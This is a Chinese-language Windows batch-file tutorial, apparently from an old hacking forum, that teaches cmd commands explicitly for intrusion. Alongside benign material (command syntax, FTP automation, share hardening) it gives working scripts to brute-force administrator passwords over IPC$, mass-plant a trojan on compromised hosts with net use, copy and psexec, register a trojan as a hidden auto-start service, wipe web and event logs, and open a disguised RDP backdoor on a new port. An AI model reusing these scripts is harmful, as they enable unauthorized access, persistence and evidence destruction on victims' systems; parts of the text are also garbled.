windows批處理命令教程

批處理文件是無格式的文本文件，它包含一條或多條命令。它的文件擴展名爲 .bat 或 .cmd。在命令提示下鍵入批處理文件的名稱，或者雙擊該批處理文件，系統就會調用Cmd.exe按照該文件中各個命令出現的順序來逐個運行它們
批處理文件是無格式的文本文件，它包含一條或多條命令。它的文件擴展名爲 .bat 或 
.cmd。在命令提示下鍵入批處理文件的名稱，或者雙擊該批處理文件，系統就會調用Cmd.exe按照該文件中各個命令出現的順序來逐個運行它們。使用批
 
處理文件（也被稱爲批處理程序或腳本），能夠簡化平常或重複性任務。固然咱們的這個版本的主要內容是介紹批處理在入侵中一些實際運用，例如咱們後面要提到
 的用批處理文件來給系統打補丁、批量植入後門程序等。下面就開始咱們批處理學習之旅吧。
一.簡單批處理內部命令簡介

1.echo 命令
打開回顯或關閉請求回顯功能，或顯示消息。若是沒有任何參數，echo 命令將顯示當前回顯設置。
語法
echo [{on|off}] [message]
Sample：@echo off / echo hello world
在實際應用中咱們會把這條命令和重定向符號（也稱爲管道符號，通常用> >> ^）結合來實現輸入一些命令到特定格式的文件中.這將在之後的例子中體現出來。
2.@ 命令
表示不顯示@後面的命令，在入侵過程當中（例如使用批處理來格式化敵人的硬盤）天然不能讓對方看到你使用的命令啦。
Sample：@echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset (format 這個命令是不可使用/y這個參數的，可喜的是微軟留了個autoset這個參數給咱們，效果和/y是同樣的。)
3.goto 命令
指定跳轉到標籤，找到標籤後，程序將處理從下一行開始的命令。
語法：goto label （label是參數，指定所要轉向的批處理程序中的行。）
Sample：
if {%1}=={} goto noparms
if {%2}=={} goto noparms（若是這裏的if、%一、%2你不明白的話，先跳過去，後面會有詳細的解釋。）
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
標籤的名字能夠隨便起，可是最好是有意義的字母啦，字母前加個：用來表示這個字母是標籤，goto命令就是根據這個：來尋找下一步跳到到那裏。最好有一些說明這樣你別人看起來纔會理解你的意圖啊。
4.Rem 命令
註釋命令，在C語言中至關與/*--------*/,它並不會被執行，只是起一個註釋的做用，便於別人閱讀和你本身往後修改。
Rem Message
Sample：@Rem Here is the descr1ption.
5.Pause 命令
運行 Pause 命令時，將顯示下面的消息：
Press any key to continue . . .
Sample：
@echo off
:begin
copy a:*.* d：back
echo Please put a new disk into driver A
pause
goto begin
在這個例子中，驅動器 A 中磁盤上的全部文件均複製到d:back中。顯示的註釋提示您將另外一張磁盤放入驅動器 A 時，pause 命令會使程序掛起，以便您更換磁盤，而後按我餳 絛 懟?
6.Call 命令
從一個批處理程序調用另外一個批處理程序，而且不終止父批處理程序。call 命令接受用做調用目標的標籤。若是在腳本或批處理文件外使用 Call，它將不會在命令行起做用。
語法
call [Drive:][Path] FileName [BatchParameters] [:label [arguments]
參數
[Drive:}[Path] FileName
指定要調用的批處理程序的位置和名稱。filename 參數必須具備 .bat 或 .cmd 擴展名。
7.start 命令
調用外部程序，全部的DOS命令和命令行程序均可以由start命令來調用。
入侵經常使用參數：
MIN 開始時窗口最小化
SEPARATE 在分開的空間內開始 16 位 Windows 程序
HIGH 在 HIGH 優先級類別開始應用程序
REALTIME 在 REALTIME 優先級類別開始應用程序
WAIT 啓動應用程序並等候它結束
parameters 這些爲傳送到命令/程序的參數
執行的應用程序是 32-位 GUI 應用程序時，CMD.EXE 不等應用程序終止就返回命令提示。若是在命令腳本內執行，該新行爲則不會發生。
8.choice 命令
choice 使用此命令可讓用戶輸入一個字符，從而運行不一樣的命令。使用時應該加/c:參數，c:後應寫提示可輸入的字符，之間無空格。它的返回碼爲1234……
如: choice /c:dme defrag,mem,end
將顯示
defrag,mem,end[D,M,E]?
Sample：
Sample.bat的內容以下:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag （應先判斷數值最高的錯誤碼）
if errorlevel 2 goto mem
if errotlevel 1 goto end
:defrag
c:dosdefrag
goto end
:mem
mem
goto end
:end
echo good bye
此文件運行後，將顯示 defrag,mem,end[D,M,E]? 用戶可選擇d m e 
，而後if語句將做出判斷，d表示執行標號爲defrag的程序段，m表示執行標號爲mem的程序段，e表示執行標號爲end的程序段，每一個程序段最後都
 以goto end將程序跳到end標號處，而後程序將顯示good bye，文件結束。
9.If 命令
if 表示將判斷是否符合規定的條件，從而決定執行不一樣的命令。 有三種格式:
一、if "參數" == "字符串" 　待執行的命令
參數若是等於指定的字符串，則條件成立，運行命令，不然運行下一句。(注意是兩個等號）
如if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms
二、if exist 文件名　 待執行的命令
若是有指定的文件，則條件成立，運行命令，不然運行下一句。
如if exist config.sys edit config.sys
三、if errorlevel / if not errorlevel 數字　 待執行的命令
若是返回碼等於指定的數字，則條件成立，運行命令，不然運行下一句。
如if errorlevel 2 goto x2 　
DOS程序運行時都會返回一個數字給DOS，稱爲錯誤碼errorlevel或稱返回碼，常見的返回碼爲0、1。
10.for 命令
for 命令是一個比較複雜的命令，主要用於參數在指定的範圍內循環執行命令。
在批處理文件中使用 FOR 命令時，指定變量請使用 %%variable
for {%variable|%%variable} in (set) do command [ CommandLineOptions]
%variable 指定一個單一字母可替換的參數。
(set) 指定一個或一組文件。可使用通配符。
command 指定對每一個文件執行的命令。
command-parameters 爲特定命令指定參數或命令行開關。
在批處理文件中使用 FOR 命令時，指定變量請使用 %%variable而不要用 %variable。變量名稱是區分大小寫的，因此 %i 不一樣於 %I
若是命令擴展名被啓用，下列額外的 FOR 命令格式會受到支持:
FOR /D %variable IN (set) DO command [command-parameters]
若是集中包含通配符，則指定與目錄名匹配，而不與文件名匹配。
FOR /R [drive:]path] %variable IN (set) DO command [command-
檢查以 [drive:]path 爲根的目錄樹，指向每一個目錄中的FOR 語句。若是在 /R 後沒有指定目錄，則使用當前目錄。若是集僅爲一個單點(.)字符，則枚舉該目錄樹。
FOR /L %variable IN (start,step,end) DO command [command-para
該集表示以增量形式從開始到結束的一個數字序列。
所以，(1,1,5) 將產生序列 1 2 3 4 5，(5,-1,1) 將產生
序列 (5 4 3 2 1)。
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (''command'') DO command
或者，若是有 usebackq 選項:
FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (''command'') DO command
filenameset 爲一個或多個文件名。繼續到 filenameset 
中的下一個文件以前，每份文件都已被打開、讀取並通過處理。處理包括讀取文件，將其分紅一行行的文字，而後將每行解析成零或更多的符號。而後用已找到的符
 號字符串變量值調用 For 循環。以默認方式，/F 經過每一個文件的每一行中分開的第一個空白符號。跳過空白行。您可經過指定可選 
"options"參數替代默認解析操做。這個帶引號的字符串包括一個或多個指定不一樣解析選項的關鍵字。這些關鍵字爲:
eol=c - 指一個行註釋字符的結尾(就一個)
skip=n - 指在文件開始時忽略的行數。
delims=xxx - 指分隔符集。這個替換了空格和跳格鍵的默認分隔符集。
tokens=x,y,m-n - 指每行的哪個符號被傳遞到每一個迭代的 for 自己。這會致使額外變量名稱的格式爲一個範圍。經過 nth 符號指定 m符號字符串中的最後一個字符星號，那麼額外的變量將在最後一個符號解析之分配並接受行的保留文本。
usebackq - 指定新語法已在下類狀況中使用:在做爲命令執行一個後引號的字符串而且引號字符爲文字字符串命令並容許在 fi中使用雙引號擴起文件名稱。
sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command
會分析 myfile.txt 中的每一行，忽略以分號打頭的那些行，將每行中的第二個和第三個符號傳遞給 for 
程序體；用逗號和/或空格定界符號。請注意，這個 for 程序體的語句引用 %i 來取得第二個符號，引用 %j 來取得第三個符號，引用 
%k來取得第三個符號後的全部剩餘符號。對於帶有空格的文件名，您須要用雙引號將文件名括起來。爲了用這種方式來使用雙引號，您還須要使用 
usebackq 選項，不然，雙引號會被理解成是用做定義某個要分析的字符串的。
%i 專門在 for 語句中獲得說明，%j 和 %k 是經過tokens= 選項專門獲得說明的。您能夠經過 tokens= 一行指定最多 
26 個符號，只要不試圖說明一個高於字母 ''z'' 或''Z'' 的變量。請記住，FOR 變量是單一字母、分大小寫和全局的；同時不能有 52 
個以上都在使用中。
您還能夠在相鄰字符串上使用 FOR /F 分析邏輯；方法是，用單引號將括號之間的 filenameset 括起來。這樣，該字符串會被看成一個文件中的一個單一輸入行。
最後，您能夠用 FOR /F 命令來分析命令的輸出。方法是，將括號之間的 filenameset 變成一個反括字符串。該字符串會被看成命令行，傳遞到一個子 CMD.EXE，其輸出會被抓進內存，並被看成文件分析。所以，如下例子:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i
會枚舉當前環境中的環境變量名稱。
另外，FOR 變量參照的替換已被加強。您如今可使用下列選項語法:
~I - 刪除任何引號(")，擴充 %I
%~fI - 將 %I 擴充到一個徹底合格的路徑名
%~dI - 僅將 %I 擴充到一個驅動器號
%~pI - 僅將 %I 擴充到一個路徑
%~nI - 僅將 %I 擴充到一個文件名
%~xI - 僅將 %I 擴充到一個文件擴展名
%~sI - 擴充的路徑只含有短名
%~aI - 將 %I 擴充到文件的文件屬性
%~tI - 將 %I 擴充到文件的日期/時間
%~zI - 將 %I 擴充到文件的大小
%~$PATH:I - 查找列在路徑環境變量的目錄，並將 %I 擴充到找到的第一個徹底合格的名稱。若是環境變量未被定義，或者沒有找到文件，此組合鍵會擴充空字符串
能夠組合修飾符來獲得多重結果:
%~dpI - 僅將 %I 擴充到一個驅動器號和路徑
%~nxI - 僅將 %I 擴充到一個文件名和擴展名
%~fsI - 僅將 %I 擴充到一個帶有短名的完整路徑名
%~dp$PATH:i - 查找列在路徑環境變量的目錄，並將 %I 擴充到找到的第一個驅動器號和路徑。
%~ftzaI - 將 %I 擴充到相似輸出線路的 DIR
在以上例子中，%I 和 PATH 可用其餘有效數值代替。%~ 語法用一個有效的 FOR 變量名終止。選取相似 %I 的大寫變量名比較易讀，並且避免與不分大小寫的組合鍵混淆。
以上是MS的官方幫助，下面咱們舉幾個例子來具體說明一下For命令在入侵中的用途。
sample2：
利用For命令來實現對一臺目標Win2k主機的暴力密碼破解。
咱們用net use /ipipc$ "password" /u:"administrator"來嘗試這和目標主機進行鏈接，當成功時記下密碼。
最主要的命令是一條：for /f i% in (dict.txt) do net use /ipipc$ "i%" /u:"administrator"
用i%來表示admin的密碼，在dict.txt中這個取i%的值用net use 命令來鏈接。而後將程序運行結果傳遞給find命令－－
for /f i%% in (dict.txt) do net use /ipipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:ok.txt ，這樣就ko了。
sample3：
你有沒有過手裏有大量肉雞等着你去種後門＋木馬呢？，當數量特別多的時候，本來很開心的一件事都會變得很鬱悶：）。文章開頭就談到使用批處理文件，能夠簡化平常或重複性任務。那麼如何實現呢？呵呵，看下去你就會明白了。
主要命令也只有一條：（在批處理文件中使用 FOR 命令時，指定變量使用 %%variable）
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法請參見上面的sample1，在這裏它表示按順序將victim.txt中的內容傳遞給door.bat中的參數%i %j %k。
而cultivate.bat無非就是用net use命令來創建IPC$鏈接，並copy木馬＋後門到victim，而後用返回碼（If errorlever =）來篩選成功種植後門的主機，並echo出來，或者echo到指定的文件。
delims= 表示vivtim.txt中的內容是一空格來分隔的。我想看到這裏你也必定明白這victim.txt裏的內容是什麼樣的了。應該根據%%i %%j %%k表示的對象來排列，通常就是 ip password username。
代碼雛形：
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------

------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------
@net use /%1ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe/%1admin$system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@psexec /%1 c:winntsystem32windrv32.exe
@psexec /%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------
這只是一個自動種植後門批處理的雛形，兩個批處理和後門程序（Windrv32.exe）,PSexec.exe需放在統一目錄下.批處理內容
尚可擴展,例如:加入清除日誌+DDOS的功能,加入定時添加用戶的功能,更深刻一點可使之具有自動傳播功能(蠕蟲).此處很少作敘述,有興趣的朋友可自行研究.
二.如何在批處理文件中使用參數

批處理中可使用參數，通常從1%到 9%這九個，當有多個參數時須要用shift來移動，這種狀況並很少見，咱們就不考慮它了。
sample1：fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
這個例子用於連續地格式化幾張軟盤，因此用的時候需在dos窗口輸入fomat.bat a，呵呵,好像有點多此一舉了～^_^
sample2：
當咱們要創建一個IPC$鏈接地時候總要輸入一大串命令，弄很差就打錯了，因此咱們不如把一些固定命令寫入一個批處理，把肉雞地ip password username 當着參數來賦給這個批處理，這樣就不用每次都打命令了。
@echo off
@net use /1%ipc$ "2%" /u:"3%" 注意哦，這裏PASSWORD是第二個參數。
@if errorlevel 1 echo connection failed
怎麼樣,使用參數仍是比較簡單的吧？你這麼帥必定學會了^_^.
三.如何使用組合命令(Compound Command)
1.&
Usage：第一條命令 & 第二條命令 [& 第三條命令...]
用這種方法能夠同時執行多條命令，而無論命令是否執行成功
Sample：
C:>dir z: & dir c:Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:Ex4rch
2002-05-14 23:51 <DIR> .
2002-05-14 23:51 <DIR> ..
2002-05-14 23:51 14 sometips.gif
2.&&
Usage：第一條命令 && 第二條命令 [&& 第三條命令...]
用這種方法能夠同時執行多條命令，當碰到執行出錯的命令後將不執行後面的命令，若是一直沒有出錯則一直執行完全部命令；
Sample：
C:>dir z: && dir c:Ex4rch
The system cannot find the path specified.
C:>dir c:Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of c:Ex4rch
2002-05-14 23:55 <DIR> .
2002-05-14 23:55 <DIR> ..
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.
在作備份的時候可能會用到這種命令會比較簡單，如：
dir file://192.168.0.1/database/backup.mdb && copy file://192.168.0.1/database/backup.mdb E:backup
若是遠程服務器上存在backup.mdb文件，就執行copy命令，若不存在該文件則不執行copy命令。這種用法能夠替換IF exist了 ：）
3.||
Usage：第一條命令 || 第二條命令 [|| 第三條命令...]
用這種方法能夠同時執行多條命令，當碰到執行正確的命令後將不執行後面的命令，若是沒有出現正確的命令則一直執行完全部命令；
Sample：
C:Ex4rch>dir sometips.gif || del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB
Directory of C:Ex4rch
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free
組合命令使用的例子：
sample：
@copy trojan.exe /%1admin$system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt
4、管道命令的使用
1.| 命令
Usage：第一條命令 | 第二條命令 [| 第三條命令...]
將第一條命令的結果做爲第二條命令的參數來使用，記得在unix中這種方式很常見。
sample：
time /t>>D:IP.log
netstat -n -p tcp|find ":3389">>D:IP.log
start Explorer
看出來了麼？用於終端服務容許咱們爲用戶自定義起始的程序，來實現讓用戶運行下面這個bat，以得到登陸用戶的IP。
2.>、>>輸出重定向命令
將一條命令或某個程序輸出結果的重定向到特定文件中, > 與 >>的區別在於，>會清除調原有文件中的內容後寫入指定文件，而>>只會追加內容到指定文件中，而不會改動其中的內容。
sample1：
echo hello world>c:hello.txt (stupid example?)
sample2:
時下DLL木馬盛行，咱們知道system32是個捉迷藏的好地方，許多木馬都削尖了腦殼往那裏鑽，DLL馬也不例外，針對這一點咱們能夠在安裝好系統和必要的應用程序後，對該目錄下的EXE和DLL文件做一個記錄：
運行CMD--轉換目錄到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt,
這樣全部的EXE和DLL文件的名稱都被分別記錄到exeback.txt和dllback.txt中,
往後如發現異常但用傳統的方法查不出問題時,則要考慮是否是系統中已經潛入DLL木馬了.
這時咱們用一樣的命令將system32下的EXE和DLL文件記錄到另外的exeback1.txt和dllback1.txt中,而後運行:
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt 
dllback1.txt>diff.txt.(用FC命令比較先後兩次的DLL和EXE文件,並將結果輸入到diff.txt中),這樣咱們就能
 
發現一些多出來的DLL和EXE文件,而後經過查看建立時間、版本、是否通過壓縮等就可以比較容易地判斷出是否是已經被DLL木馬光顧了。沒有是最好，如
 果有的話也不要直接DEL掉，先用regsvr32 /u 
trojan.dll將後門DLL文件註銷掉,再把它移到回收站裏，若系統沒有異常反映再將之完全刪除或者提交給殺毒軟件公司。
3.< 、>& 、<&
< 從文件中而不是從鍵盤中讀入命令輸入。
>& 將一個句柄的輸出寫入到另外一個句柄的輸入中。
<& 從一個句柄讀取輸入並將其寫入到另外一個句柄輸出中。
這些並不經常使用，也就很少作介紹。
五.如何用批處理文件來操做註冊表
在入侵過程當中常常回操做註冊表的特定的鍵值來實現必定的目的，例如:爲了達到隱藏後門、木馬程序而刪除Run下殘餘的鍵值。或者建立一個服務用以加
載後 
門。固然咱們也會修改註冊表來加固系統或者改變系統的某個屬性，這些都須要咱們對註冊表操做有必定的瞭解。下面咱們就先學習一下如何使用.REG文件來操
 做註冊表.(咱們能夠用批處理來生成一個REG文件)
關於註冊表的操做，常見的是建立、修改、刪除。
1.建立
建立分爲兩種，一種是建立子項(Subkey)
咱們建立一個文件，內容以下：
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosofthacker]
而後執行該腳本，你就已經在HKEY_LOCAL_MACHINESOFTWAREMicrosoft下建立了一個名字爲「hacker」的子項。
另外一種是建立一個項目名稱
那這種文件格式就是典型的文件格式，和你從註冊表中導出的文件格式一致，內容以下：
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"Invader"="Ex4rch"
"Door"=C:/WINNT/system32/door.exe
"Autodos"=dword:02
這樣就在[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]下
新建了:Invader、door、about這三個項目
Invader的類型是「String Value」
door的類型是「REG SZ Value」
Autodos的類型是「DWORD Value」
2.修改
修改相對來講比較簡單，只要把你須要修改的項目導出，而後用記事本進行修改，而後導入（regedit /s）便可。
3.刪除
咱們首先來講說刪除一個項目名稱，咱們建立一個以下的文件：
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"Ex4rch"=-
執行該腳本，[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]下的"Ex4rch"就被刪除了；
咱們再看看刪除一個子項，咱們建立一個以下的腳本：
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
執行該腳本，[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]就已經被刪除了。
相信看到這裏，.reg文件你基本已經掌握了。那麼如今的目標就是用批處理來建立特定內容的.reg文件了，記得咱們前面說道的利用重定向符號能夠很容易地建立特定類型的文件。
samlpe1:如上面的那個例子,如想生成以下注冊表文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只須要這樣：
@echo Windows Registry Editor Version 5.00>>Sample.reg
@echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C:/WINNT/system32/door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg
samlpe2:
咱們如今在使用一些比較老的木馬時,可能會在註冊表的 
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun(Runonce、 
Runservices、Runexec)]下生成一個鍵值用來實現木馬的自啓動.可是這樣很容易暴露木馬程序的路徑,從而致使木馬被查殺,相對地如果將
 木馬程序註冊爲系統服務則相對安全一些.下面以配置好地IRC木馬DSNX爲例(名爲windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:winntsystem32windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [刪除DSNXDE在註冊表中的啓動項，用sc.exe將之註冊爲系統關鍵性服務的同時將其屬性設爲隱藏和只讀，並config爲自啓動]
@REM 這樣不是更安全^_^.
六.精彩實例放送

1.刪除win2k/xp系統默認共享的批處理
------------------------ cut here then save as .bat or .cmd file ---------------------------
@echo preparing to delete all the default shares.when ready pres any key.
@pause
@echo off
:Rem check parameters if null show usage.
if {%1}=={} goto :Usage
:Rem code start.
echo.
echo ------------------------------------------------------
echo.
echo Now deleting all the default shares.
echo.
net share %1$ /delete
net share %2$ /delete
net share %3$ /delete
net share %4$ /delete
net share %5$ /delete
net share %6$ /delete
net share %7$ /delete
net share %8$ /delete
net share %9$ /delete
net stop Server
net start Server
echo.
echo All the shares have been deleteed
echo.
echo ------------------------------------------------------
echo.
echo Now modify the registry to change the system default properties.
echo.
echo Now creating the registry file
echo Windows Registry Editor Version 5.00> c:delshare.reg
echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters]>> c:delshare.reg
echo "AutoShareWks"=dword:00000000>> c:delshare.reg
echo "AutoShareServer"=dword:00000000>> c:delshare.reg
echo Nowing using the registry file to chang the system default properties.
regedit /s c:delshare.reg
echo Deleting the temprotarily files.
del c:delshare.reg
goto :END
:Usage
echo.
echo ------------------------------------------------------
echo.
echo ☆ A example for batch file ☆
echo ☆ [Use batch file to change the sysytem share properties.] ☆
echo.
echo Author：Ex4rch
echo Mail:Ex4rch@hotmail.com QQ:1672602
echo.
echo Error：Not enough parameters
echo.
echo ☆ Please enter the share disk you wanna delete ☆
echo.
echo For instance，to delete the default shares:
echo delshare c d e ipc admin print
echo.
echo If the disklable is not as C: D: E: ，Please chang it youself.
echo.
echo example：
echo If locak disklable are C: D: E: X: Y: Z: ，you should chang the command into ：
echo delshare c d e x y z ipc admin print
echo.
echo *** you can delete nine shares once in a useing ***
echo.
echo ------------------------------------------------------
goto :EOF
:END
echo.
echo ------------------------------------------------------
echo.
echo OK,delshare.bat has deleted all the share you assigned.
echo.Any questions ,feel free to mail toEx4rch@hotmail.com.
echo
echo.
echo ------------------------------------------------------
echo.
:EOF
echo end of the batch file
------------------------ cut here then save as .bat or .cmd file ---------------------------
2.全面加固系統（給肉雞打補丁）的批處理文件
------------------------ cut here then save as .bat or .cmd file ---------------------------
@echo Windows Registry Editor Version 5.00 >patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters] >>patch.dll
@echo "AutoShareServer"=dword:00000000 >>patch.dll
@echo "AutoShareWks"=dword:00000000 >>patch.dll
@REM [禁止共享]
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa] >>patch.dll
@echo "restrictanonymous"=dword:00000001 >>patch.dll
@REM [禁止匿名登陸]
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetBTParameters] >>patch.dll
@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll
@REM [禁止及文件訪問和打印共享]
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices@REMoteRegistry] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSchedule] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] >>patch.dll
@echo "ShutdownWithoutLogon"="0" >>patch.dll
@REM [禁止登陸前關機]
@echo "DontDisplayLastUserName"="1" >>patch.dll
@REM [禁止顯示前一個登陸用戶名稱]
@regedit /s patch.dll
------------------------ cut here then save as .bat or .cmd file ---------------------------
下面命令是清除肉雞全部日誌，禁止一些危險的服務，並修改肉雞的terminnal service留跳後路。
@regedit /s patch.dll
@net stop w3svc
@net stop event log
@del c:winntsystem32logfilesw3svc1*.* /f /q
@del c:winntsystem32logfilesw3svc2*.* /f /q
@del c:winntsystem32config*.event /f /q
@del c:winntsystem32dtclog*.* /f /q
@del c:winnt*.txt /f /q
@del c:winnt*.log /f /q
@net start w3svc
@net start event log
@rem [刪除日誌]

@net stop lanmanserver /y
@net stop Schedule /y
@net stop RemoteRegistry /y
@del patch.dll
@echo The server has been patched,Have fun.
@del patch.bat
@REM [禁止一些危險的服務。]
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp] >>patch.dll
@echo "PortNumber"=dword:00002010 >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp >>patch.dll
@echo "PortNumber"=dword:00002012 >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuService] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo "ErrorControl"=dword:00000001 >>patch.dll
@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00, >>patch.dll
@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65, >>patch.dll
@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll
@echo "ObjectName"="LocalSystem" >>patch.dll
@echo "Type"=dword:00000010 >>patch.dll
@echo "Descr1ption"="Keep record of the program and windows'' message。" >>patch.dll
@echo "DisplayName"="Microsoft EventLog" >>patch.dll
@echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicestermservice] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@copy c:winntsystem32termsrv.exe c:winntsystem32eventlog.exe
@REM [修改3389鏈接，端口爲8210(十六進制爲00002012)，名稱爲Microsoft EventLog，留條後路]
rem Author: Munga Bunga - from Australia, the land full of retarded Australian''s (help me get out of here) 
用批處理命令實現FTP文件的自動傳輸
因爲工做的緣由，天天須要在Windows操做系統之間或與其它操做系統如UNIX等利用FTP進行文件傳輸。常常重複這樣的工做程序，即繁瑣又容
易出 
錯。本人通過思考摸索，在Windows操做系統的「任務計劃」幫助下，成功地用批處理命令實現FTP文件的自動傳輸。現將此操做過程詳解，但願對同好有
 所幫助，更望能拋磚引玉，提出更好的方法。
假設本機操做系統爲Windows操做系統，需進行文件傳輸的目錄爲C:＼datatran；對方計算機操做系統爲UNIX操做系統，IP地址爲 
10.30.15.3，需進行文件傳輸的目錄爲C:＼data，登陸用戶名爲Anonymous，口令爲123456。從本機到對方機接收文件操做方法如
 下。
第一步，先新建一個文本：
Open 10.31.15.3
User anonymous
123456
Cd data
Bin
Prompt
Mget *.*
Bye
Quit
Exit
將該文本保存爲1.ftp存放到C盤根目錄。該文件只要擴展名爲ftp，前綴可任意取名。目錄也不必定要在根目錄，主要以方便爲主。文本中Bin爲
用黑吧 
碼格式傳輸文件，如用ASCII碼格式傳輸文件可去掉該行。如爲本機向對方機發送文件，則只要將文本中的Mget替換成Mput便可。這以後，再新建另外一
 個文本：
C:
Cd datatran
ftp–n–s:」c:＼1.ftp」
新建完畢後將該文本保存爲1.bat後存放在硬盤任何分區或軟盤中都可。這樣，第一步工做已經完成，您隨時能夠執行該批處理文件進行FTP文件的傳輸。
第二步，將該該批處理文件放在「任務計劃」中設定自動運行。方法是：打開「開始」菜單「程序」下「附件」中的「系統工具」，點擊「任務計劃」，執行
「添加 
任務計劃」，按「任務計劃嚮導」提示將該批處理文件添加到任務計劃中，並指定執行週期，以後再設下密碼後即完成。今後，計算機會根據您的設定，自動週期性
 地進行文件接收或發送，再也不須要您動一下手指，真正作到它工做，您休息。
另外，若是是Windows操做系統之間進行FTP進行文件傳輸，只要去掉1.ftp中「Bin」一行就能夠了.
....................................................................................................................................................................................................................
echo、@、call、pause、rem(小技巧：用::代替rem)是批處理文件最經常使用的幾個命令。
echo 表示顯示此命令後的字符
echo off 表示在此語句後全部運行的命令都不顯示命令行自己
@與echo off相象，但它是加在每一個命令行的最前面，表示運行時不顯示這一行的命令行（只能影響當前行）。
call 調用另外一個批處理文件（若是不用call而直接調用別的批處理文件，那麼執行完那個批處理文件後將沒法返回當前文件並執行當前文件的後續命令）。
pause 運行此句會暫停批處理的執行並在屏幕上顯示Press any key to continue...的提示，等待用戶按任意鍵後繼續
rem 表示此命令後的字符爲解釋行（註釋），不執行，只是給本身從此參考用的（至關於程序中的註釋）。

